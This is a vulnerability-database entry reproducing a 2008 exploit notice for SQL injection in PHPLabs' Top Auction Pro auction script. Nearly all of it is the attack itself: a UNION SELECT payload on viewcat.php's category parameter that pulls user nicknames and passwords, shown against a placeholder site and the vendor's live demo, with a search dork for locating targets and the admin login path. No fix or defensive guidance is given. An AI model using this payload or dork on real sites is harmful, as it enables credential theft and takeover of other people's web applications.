Top Auction Pro (category) Remote SQL Injection Vulnerability

2008-06-22T00:00:00
ID SSV:8802
Type seebug
Reporter Root
Modified 2008-06-22T00:00:00

Description

No description provided by source.

                                        
                                            
                                                #########################################################
#
#   Top Auction   SQL Injection Vulnerability
#========================================================
#    Author: Hussin X                                   =
#                                                       =
#    Home :  www.tryag.cc/cc                            =
#                                                       =
#    email:  darkangel_g85[at]Yahoo[DoT]com             =
#            hussin.x[at]hotmail[DoT]com                =
#                                                       =
#========================================================
#    HomE script : http://www.phplabs.com
#     
#    Demo : http://www.phplabs.com/demo/ta/   
#
#
#    DorK :  Top Auction Pro from PHPLabs.com
#
#      
##########################################################

Exploit:   


http://www.site.com/[PATS]/viewcat.php?category=-2+union+select+1,concat_ws(0x3a,nick,password),3+from+users--



L!VE DEMO:

http://www.phplabs.com/demo/ta/viewcat.php?category=-2+union+select+1,concat_ws(0x3a,nick,password),3+from+users--


LogiN:

admin/index.php


################################################################################
####################################( Greetz )##################################
#                                                                              #
#      tryag / Mr.IraQ / DeViL iRaQ / IRAQ DiveR/ IRAQ_JAGUAR /str0ke          #      
#                Silic0n  / Rafi / FAHD / Iraqihack                            #       
#                                                                              #
#################################(and All IRAQIs)###############################
################################################################################